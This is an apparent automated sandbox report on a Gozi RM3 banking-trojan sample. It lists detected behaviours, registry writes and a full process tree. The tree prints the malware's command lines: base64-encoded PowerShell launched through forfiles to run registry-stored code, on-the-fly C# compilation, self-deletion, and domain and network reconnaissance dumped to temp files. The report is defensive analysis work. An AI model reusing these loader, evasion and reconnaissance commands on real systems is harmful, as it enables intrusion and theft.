Analysis Overview
SHA256
0f4395c5cdee1c9fe28ef9a63355594f0f7a23aa41e52b8085a0bda8715da13f
Threat Level: Known bad
The file Restr.com was found to be: Known bad.
Malicious Activity Summary
Gozi RM3
Grants admin privileges
Deletes itself
Uses Tor communications
Drops file in System32 directory
Program crash
Modifies Internet Explorer settings
Delays execution with timeout.exe
Enumerates processes with tasklist
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: MapViewOfSection
Runs net.exe
Suspicious use of WriteProcessMemory
Suspicious use of SetWindowsHookEx
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Discovers systems in the same network
Gathers system information
MITRE ATT&CK
Enterprise Matrix V6
Analysis: static1
Detonation Overview
Reported
2022-03-15 08:05
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2022-03-15 08:05
Reported
2022-03-15 08:35
Platform
win7-20220310-en
Max time kernel
813s
Max time network
1783s
Command Line
Signatures
Gozi RM3
Grants admin privileges
Deletes itself
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\System32\cmd.exe | N/A |
Uses Tor communications
Drops file in System32 directory
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| File opened for modification | C:\Windows\System32\WindowsPowerShell\v1.0\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\System32\WindowsPowerShell\v1.0\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\System32\WindowsPowerShell\v1.0\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
Discovers systems in the same network
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\system32\net.exe | N/A |
Enumerates processes with tasklist
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
Gathers system information
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\system32\systeminfo.exe | N/A |
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Key created | \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000004dda8e4cddf84341b86bc814e98354e5000000000200000000001066000000010000200000001253851e9c72fbbe26a60558a052caefc4be7f0b92c10d76852aa1a667d30ade000000000e80000000020000200000009f5faac493dd9e81ae8424f27edb184bf46ffd484adefe22c7ca1a5289f255ce300100006ebf813f74442d1aa7235a6d1c89baec15b851ede5e64ca295567c2d94d341b782bfc9c57b7542108f13ef522e0b1864116cd6908789d15893d8422b13a586603c02114a5652059d7ddabceebea2971e03dcce8c4c0215680c37afe7bfc1b9a21efcdd9581859a1f198d9ddb3567a88b3f78ebad11cee2a648d564edbc40849621c0e36f683ad4d11309e55e2903807e5bbcdb8293737f9df35b6a334902ab35ea0cd297f0bec821da5130ba4d92f9e45e0ee5d67744fe0aa2f7e2be61323cf02023978bd858bcfe7b4e7751cf191cdbe3b2140b3814de7b4a8712e55478f569b108913ce2410348b8f1528c04248ab2331ef22d4e2f36e7da2babcd03bf799f9249c6a03980e46bd3dc2286d75305d017c266050da68668d97b013e9820d084da11d4a6e0c6654eaa1efaa3484a6b16400000001d9618d6d327e40799885ed9fba9f6bc2c5009edb5b36980b9c87e5b6ee241f32346911de923bb0cfd039488233a4627e6f43c4f5f617d7b12649b70c532e07c | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000000000001000000ffffffffffffffffffffffffffffffff6f00000019000000f50400007e020000 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000000000001000000ffffffffffffffffffffffffffffffff3d0000003d000000c3040000a2020000 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\MINIE\TabBandWidth = "500" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000000000001000000ffffffffffffffffffffffffffffffff19000000190000009f0400007e020000 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\IntelliForms | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\PageSetup | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000000000001000000ffffffffffffffffffffffffffffffff00000000000000008604000065020000 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\GPU | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\InternetRegistry | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\Zoom | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000004dda8e4cddf84341b86bc814e98354e500000000020000000000106600000001000020000000aba5a280f62324e21f7f014358dc7dc828ddc09c3f1209c6f292816716ad489d000000000e80000000020000200000005d3c957ae64c72dcdf974d8aab995bffa2d460e23d100038593cb637480f6aad200000002f31e5f4f1311847e5ffac143389ddbc70ba92904edbbb62588dc8a1be0d1e2840000000432722c5302fad0f3b00bc4947b6008f48fef9c7eab09ba0679698e4965ab81cb6ae14b00fefa2e9854de89198a0e65bc4d0909cd6e6f479a62a00a1419e9229 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\IETld\LowMic | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\Toolbar | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 40e6dbe04b38d801 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\MINIE | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000000000001000000ffffffffffffffffffffffffffffffff5600000000000000dc04000065020000 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000004dda8e4cddf84341b86bc814e98354e500000000020000000000106600000001000020000000140a62193c077483292e4f6d9df2a0177eb679dadc9e0bb37c84ac51a3f5494f000000000e80000000020000200000004f2ea5f9daa1daa926b61a42f0f53ffa1df2c1d8622ece9fc6fbf3d4e2ec322230010000b94dc60e7ebc267dc91e1362f6bcf4388c2c870af1ddd1018c86a7c822866c62081143ccf1604650ae9e404ceb4a027f25c5c48f34dc36b19bddf0882b8e8d1d49a12fa83366b8267be50ad1eba781f73f7e084bba7cd11859d16de3a49907b2378a0d696b7c3769e24184c700c649601998c53d2ccaa8cd3ff2ffcf9ade9396a9611eff189d8ad0a20116f164ff0940159c8bcbe8bc3bbd2851ed52c8b8acff7b6e44cd683d0f96e84b086d3432bea1e668c6a83946269b07afd645ac621644689f12e09d1dc35890f6843b576be7b24d1293b274a857f3e3b6f6d4f440c27f967846be2e7b88391e4f9ea0db8e636a187dfad5652475a050593facd189bfb4dd5171fed4e38925b869d16e66560f2243ad90c32edc84fb64484c84a34140409625d0e2fd6bf94545d277c49ef89fc7400000002d5a52d1000e5e2acb15a94b9cdb455034a15db0cfea7f109b91eb32a78a9f4a55abd17016ee42870400a14bddab5927f79f4f9e59d96caae0edf68bd80afe1f | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000000000001000000ffffffffffffffffffffffffffffffff3200000032000000b804000097020000 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000004dda8e4cddf84341b86bc814e98354e500000000020000000000106600000001000020000000add77028ae60a5f74186fe22959bfba532792f8ded1cda1f1a59241ff76346e1000000000e80000000020000200000009f7396147e2cd775626a8c1d6fd4ca0ea1752e716d6c72e5b6ab13e151ec4461300100001d4e4649784e956f90c6e4b37578ffde573a7e511f034748dc6e998f4bd73f52347a29eae71d93d6580ae567566e129d121034aba720fe2ea78ee30b259cf208282876e323e4ede5a7d5fb0901cfa368314c04743337bf720cbb1c2103c31dd451204c68aa59fe7c8f8dcb2ea6a59be10c8c025a38ebdb90479f92a212bd001682f47ea63fd1ce8ac830de3cdb61377371a04e97aeb4caf6a99d6e098af6c77ad89f24240c0e90ca53527c7a17a3cf04bbafe4a941fae129f9d282f78185302cca8e492efb5a66e7f2b018b8d9c2277bada8139a06c5b5f879e1a82b05620115664804cd489d129f6133c1b0384b095132a9fc3563dba565386145c144bd175303bdb3743b5fe7fb50e22ced5bccc6a616674e4875154fea273c391a3822e49be06f6f1030d9b0008de64bd28311b26c400000009001a73704a71160e44c15b19a492f8f3fe591b79a9748d3fbb08183ab5538b9da8fc7c56bff904469861f061501e81b52dda8badfb63f04f6a3da3cdabc54dd | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\LowRegistry | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{17D90BF1-A43F-11EC-A594-F6E36C9641D9} = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
Runs net.exe
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Restr.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\whoami.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\whoami.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\whoami.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\whoami.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\whoami.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\whoami.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\whoami.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\whoami.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\whoami.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\whoami.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\whoami.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\whoami.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\whoami.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\whoami.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\whoami.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\whoami.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\whoami.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\whoami.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\whoami.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\whoami.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\whoami.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\whoami.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\whoami.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\tasklist.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
Suspicious use of SetWindowsHookEx
Suspicious use of WriteProcessMemory
Processes
C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
C:\Users\Admin\AppData\Local\Temp\Restr.exe
"C:\Users\Admin\AppData\Local\Temp\Restr.exe"
C:\Program Files\Internet Explorer\iexplore.exe
"C:\Program Files\Internet Explorer\iexplore.exe" -Embedding
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2020 CREDAT:275457 /prefetch:2
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2020 CREDAT:734213 /prefetch:2
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c start /min forfiles /c "cmd /k @path -ec aQBlAHgAIAAoAGcAcAAgACcASABLAEMAVQA6AFwAUwBvAGYAdAB3AGEAcgBlAFwATQBvAGQAZQBhAHIAYwBoAGkAdgBlACcAKQAuAFMA & exit" /p C:\Windows\system32 /s /m po*l.e*e
C:\Windows\system32\forfiles.exe
forfiles /c "cmd /k @path -ec aQBlAHgAIAAoAGcAcAAgACcASABLAEMAVQA6AFwAUwBvAGYAdAB3AGEAcgBlAFwATQBvAGQAZQBhAHIAYwBoAGkAdgBlACcAKQAuAFMA & exit" /p C:\Windows\system32 /s /m po*l.e*e
C:\Windows\system32\cmd.exe
/k "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" -ec aQBlAHgAIAAoAGcAcAAgACcASABLAEMAVQA6AFwAUwBvAGYAdAB3AGEAcgBlAFwATQBvAGQAZQBhAHIAYwBoAGkAdgBlACcAKQAuAFMA & exit
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -ec aQBlAHgAIAAoAGcAcAAgACcASABLAEMAVQA6AFwAUwBvAGYAdAB3AGEAcgBlAFwATQBvAGQAZQBhAHIAYwBoAGkAdgBlACcAKQAuAFMA
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -E JwBwAGEAcgBhAG0AKAAkAG8AdgB0AHMAbAB5ACkAOwBbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABvAHYAdABzAGwAeQApACcA
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -E JwBwAGEAcgBhAG0AKAAkAHAAYgBmAG0AYwBnAHQAcwB1AGYAbQApADsAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJAC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAHAAYgBmAG0AYwBnAHQAcwB1AGYAbQApACcA
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\cjxp6gcr.cmdline"
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESFFA4.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCFFA3.tmp"
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\adua5uv0.cmdline"
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES21.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC20.tmp"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C timeout /t 5 && del "C:\USERS\ADMIN\APPDATA\LOCAL\TEMP\RESTR.EXE"
C:\Windows\system32\timeout.exe
timeout /t 5
C:\Windows\system32\iexpress.exe
iexpress.exe /n /q /m C:\Users\Admin\AppData\Local\Temp\6D90.bin
C:\Windows\system32\makecab.exe
C:\Windows\system32\makecab.exe /f "C:\Users\Admin\~Columnsoftware.DDF"
C:\Windows\system32\cmd.exe
cmd /C "net group "domain computers" /domain" >> C:\Users\Admin\AppData\Local\Temp\A5C0.bin0
C:\Windows\system32\net.exe
net group "domain computers" /domain
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 group "domain computers" /domain
C:\Windows\syswow64\svchost.exe
C:\Windows\syswow64\svchost.exe
C:\Windows\system32\cmd.exe
cmd /C "net session" >> C:\Users\Admin\AppData\Local\Temp\5BA0.bin0
C:\Windows\system32\net.exe
net session
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 session
C:\Windows\system32\cmd.exe
cmd /U /C "type C:\Users\Admin\AppData\Local\Temp\5BA0.bin0 > C:\Users\Admin\AppData\Local\Temp\5BA0.bin & del C:\Users\Admin\AppData\Local\Temp\5BA0.bin0"
C:\Windows\system32\cmd.exe
cmd /C "systeminfo.exe" >> C:\Users\Admin\AppData\Local\Temp\7AD4.bin0
C:\Windows\system32\systeminfo.exe
systeminfo.exe
C:\Windows\system32\cmd.exe
cmd /C "echo -------- 1" >> C:\Users\Admin\AppData\Local\Temp\7AD4.bin0
C:\Windows\system32\cmd.exe
cmd /C "net view" >> C:\Users\Admin\AppData\Local\Temp\7AD4.bin0
